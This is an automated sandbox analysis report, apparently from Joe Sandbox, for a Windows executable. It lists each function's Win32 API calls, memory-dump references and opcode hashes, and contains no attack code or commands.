Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0082695D
TranslateAcceleratorW.USER32(?,?,?), ref: 008269A9
TranslateMessage.USER32(?), ref: 008269D2
DispatchMessageW.USER32(?), ref: 008269DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008269EB

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 873165542e68e5f84427a07ee7d600bcf08a981267a6cfd9ddef476ef90d5d3e
Instruction ID: b0e3b995205e50a7ec5a98f64292b2c1907c535e170dd64bbca70bb06d65ae34
Opcode Fuzzy Hash: 873165542e68e5f84427a07ee7d600bcf08a981267a6cfd9ddef476ef90d5d3e
Instruction Fuzzy Hash: AB318271900266ABDB20DFB4AC84BB67BA8FB11304F184166E522D31A1FB7598E5DB90

Function 00828F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00828F12
PostMessageW.USER32(?,00000201,00000001), ref: 00828FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00828FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00828FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00828FDA

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: f50f35d80366f0565f285728f18c9c028300fa725dd61dcbef8dfda58d65f623
Instruction ID: 685e491676ca3dae8f96360654cacbbeca39b439cd3ec07c26dd055693d4452e
Opcode Fuzzy Hash: f50f35d80366f0565f285728f18c9c028300fa725dd61dcbef8dfda58d65f623
Instruction Fuzzy Hash: F931EE71501229EFDF00CF68EA4CA9E7BB6FB04316F104229FA24EB1D1CBB09954CB90

Function 0082B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0082B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0082B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0082B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0082B742
_wcsstr.LIBCMT ref: 0082B74C

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 87b786fc9da2ce991b59c4bfe039cd35f5c6c8cce74f2be618e98635a597db33
Instruction ID: 6ffbb40db8c904b14c748d1b848aa099661704af24b76310ffc31e91cfb015f3
Opcode Fuzzy Hash: 87b786fc9da2ce991b59c4bfe039cd35f5c6c8cce74f2be618e98635a597db33
Instruction Fuzzy Hash: 37210A71205258FFEB155B39AC49E7B7BE8EF55711F004039F905CA2A2EF65DC809250

Function 0085B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

GetWindowLongW.USER32(?,000000F0), ref: 0085B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0085B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0085B489
GetSystemMetrics.USER32(00000004), ref: 0085B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00841184,00000000), ref: 0085B4D0

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 19a529ab75753c5af9549a079fe94be49cad4cd888b7a96cab59a2062e19a50c
Instruction ID: af25ee9affba670221ad8b72a2e41eae3fc04f582c1b2e4809372f5376a291ba
Opcode Fuzzy Hash: 19a529ab75753c5af9549a079fe94be49cad4cd888b7a96cab59a2062e19a50c
Instruction Fuzzy Hash: 9021E231A10255AFCB209F38CC08A6A3BA4FB14726F154779FD26D31E2E7309C24DB84

Function 008297E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00829802

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00829834
__itow.LIBCMT ref: 0082984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00829874
__itow.LIBCMT ref: 00829885

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 06a5d2c1370fab57caf1a695a8a6c32d53c70a405fc219bf2bf9f5d15ab0a2cc
Instruction ID: 3a972af6b3ebe175ef037b88bc23932231b6413bae098fbcd6f4d459d7623edd
Opcode Fuzzy Hash: 06a5d2c1370fab57caf1a695a8a6c32d53c70a405fc219bf2bf9f5d15ab0a2cc
Instruction Fuzzy Hash: 36210A71B00218ABDB10AA659C8AEEE3BF9FF59710F080035FE44EB341E6748D81C791

Function 007D12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007D134D
SelectObject.GDI32(?,00000000), ref: 007D135C
BeginPath.GDI32(?), ref: 007D1373
SelectObject.GDI32(?,00000000), ref: 007D139C

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: df3b8020be2688d84fa7c31820da59c4485b5f3c3570d522dde066386053604e
Instruction ID: 75b08570f0387d7cd01891a547a6eba76d1c8a48c9b929cb371632b8f3eb96fb
Opcode Fuzzy Hash: df3b8020be2688d84fa7c31820da59c4485b5f3c3570d522dde066386053604e
Instruction Fuzzy Hash: 6B215070800308EFDB11AF25DD087697BB8FB10362F588237F910A66A1E77999A1DF90

Function 0082C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0082C176
_memcmp.LIBCMT ref: 0082C194
_memcmp.LIBCMT ref: 0082C1A7
_memcmp.LIBCMT ref: 0082C1BF
_memcmp.LIBCMT ref: 0082C1D7

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 0ce8119c415f2448c62f640f55f786a1eb076f654d9bbbe85f20356cf9763eda
Instruction ID: c92a506a98257debd5f76fb655d1457f108258a2192db342e94b8324d0841131
Opcode Fuzzy Hash: 0ce8119c415f2448c62f640f55f786a1eb076f654d9bbbe85f20356cf9763eda
Instruction Fuzzy Hash: FF0192A160452DBBE204A6216C47EBF775CFF213A8F844121FE14D6383EA599E61C2E0

Function 00834D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00834D5C
__beginthreadex.LIBCMT ref: 00834D7A
MessageBoxW.USER32(?,?,?,?), ref: 00834D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00834DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00834DAC

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: a4baafa8f2499b701477353dea57f0daff5019976238a6d76b40f2ab1c8cbb12
Instruction ID: 6f5050fe55a6ef25445539761bc3fe4ff14b524c957d9d28f4857c1d1358d7c6
Opcode Fuzzy Hash: a4baafa8f2499b701477353dea57f0daff5019976238a6d76b40f2ab1c8cbb12
Instruction Fuzzy Hash: 46110872904208BBC711ABB8DC08ADB7FACFB85321F184266FA14D3351D6758D0487E0

Function 0082874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00828766
GetLastError.KERNEL32(?,0082822A,?,?,?), ref: 00828770
GetProcessHeap.KERNEL32(00000008,?,?,0082822A,?,?,?), ref: 0082877F
RtlAllocateHeap.NTDLL(00000000,?,0082822A), ref: 00828786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0082879D

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: 2d4f01c994fceb13f1f8a4d32726a00f71710994aa13c6481321ea337f1c87ff
Instruction ID: 5720e49ebc11c50ce6364972ea23954bd42b994ff48925616ac47989e99c3188
Opcode Fuzzy Hash: 2d4f01c994fceb13f1f8a4d32726a00f71710994aa13c6481321ea337f1c87ff
Instruction Fuzzy Hash: 57014B71202214EFDB204FA6EC88D6B7BACFF89356B200469F949C3260DA318C50CA60

Function 008354E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00835502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00835510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00835518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00835522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0083555E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 0f933875fd8290f568fa4c5c04472d3128540794fc203e3d080a883783be1d1a
Instruction ID: 4c8c853cf215b4cf3406095a58d6bcaafff9c54a0cf3715bf62c8f41106dd547
Opcode Fuzzy Hash: 0f933875fd8290f568fa4c5c04472d3128540794fc203e3d080a883783be1d1a
Instruction Fuzzy Hash: F3011B75D01A2DDBCF00EFE8E8485EDBB79FB49712F010456E901F2151DB34A654C7A1

Function 008285F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00828608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00828612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00828621
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00828628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0082863E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: befe523a58c7dd58c68fca84f2ebd629db323e7b2948b062f4987bbae4662355
Instruction ID: 43f25790b8628efac7e3a16ae1fa9eefd5aedadae04d17b5923e010862fb6b33
Opcode Fuzzy Hash: befe523a58c7dd58c68fca84f2ebd629db323e7b2948b062f4987bbae4662355
Instruction Fuzzy Hash: CBF0AF34242315EFEB210FA4EC8DE6B3BACFF89755B400025FA05C2191CB649C85DA60

Function 00828652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00828669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00828673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00828682
RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00828689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0082869F

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: b3cec53dba41095fe936182b8004a93ae301e92593ea4388f287f12a3139cf4d
Instruction ID: 44cd2af7b1b56684684eef03927c4a79c66469efd8f5167aa0a02af59aa78a9d
Opcode Fuzzy Hash: b3cec53dba41095fe936182b8004a93ae301e92593ea4388f287f12a3139cf4d
Instruction Fuzzy Hash: 4AF0AF70242314EFEB111FA4EC8CE6B3BADFF89756B140025FA05C2191CB649844DA60

Function 0082C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0082C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 0082C6D1
MessageBeep.USER32(00000000), ref: 0082C6E9
KillTimer.USER32(?,0000040A), ref: 0082C705
EndDialog.USER32(?,00000001), ref: 0082C71F

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 6c84ab794da58f1a30163dfaa6191bb5ccd42cf8a81410b377dd612214c14fb7
Instruction ID: 7e7d7a20651acb920c4151682a5ae1c0d4dfb8fd226d8067f92451c3a1f6d2a9
Opcode Fuzzy Hash: 6c84ab794da58f1a30163dfaa6191bb5ccd42cf8a81410b377dd612214c14fb7
Instruction Fuzzy Hash: 110167305007149BEB216B64ED5EFA677F8FF14746F00056EF642E14E1DBE469948F41

Function 007D13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 007D13BF
StrokeAndFillPath.GDI32(?,?,0080BAD8,00000000,?), ref: 007D13DB
SelectObject.GDI32(?,00000000), ref: 007D13EE
DeleteObject.GDI32 ref: 007D1401
StrokePath.GDI32(?), ref: 007D141C

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 776857790dc1a67ea569573d0c8ce1b5ed8fa80e237f8ebe0dd19d77dbc3399b
Instruction ID: 4f09b0f806ae049ae300f8fe53fe74afdc235cb65bcd2a0e7a5c6507b99328c0
Opcode Fuzzy Hash: 776857790dc1a67ea569573d0c8ce1b5ed8fa80e237f8ebe0dd19d77dbc3399b
Instruction Fuzzy Hash: 9FF0AF30004748ABDB126F26EC0C7583BA4BB01326F588226F529951F2D73989A5DF60

Function 00828E74 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00828E7F
CloseHandle.KERNEL32(?), ref: 00828E94
CloseHandle.KERNEL32(?), ref: 00828E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00828EA5
HeapFree.KERNEL32(00000000), ref: 00828EAC

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessSingleWait
String ID:
API String ID: 3751786701-0
Opcode ID: 079179bdc16e91850151e3be98c6c041c826c63b0a67a3328f96a4e6d371dbb5
Instruction ID: 4dbc0c80f970eb709fd5b187118ba4637ec762263d90b2b7a558a1a8551761de
Opcode Fuzzy Hash: 079179bdc16e91850151e3be98c6c041c826c63b0a67a3328f96a4e6d371dbb5
Instruction Fuzzy Hash: 00E0C236044601FBDA022FE1EC0C94ABB69FB89323B508230F31981571CB3AA420DB50

Function 007E2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 007F0FF6: std::exception::exception.LIBCMT ref: 007F102C
Part of subcall function 007F0FF6: __CxxThrowException@8.LIBCMT ref: 007F1041

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 007D7BB1: _memmove.LIBCMT ref: 007D7C0B

__swprintf.LIBCMT ref: 007E302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007E2EC6

Memory Dump Source

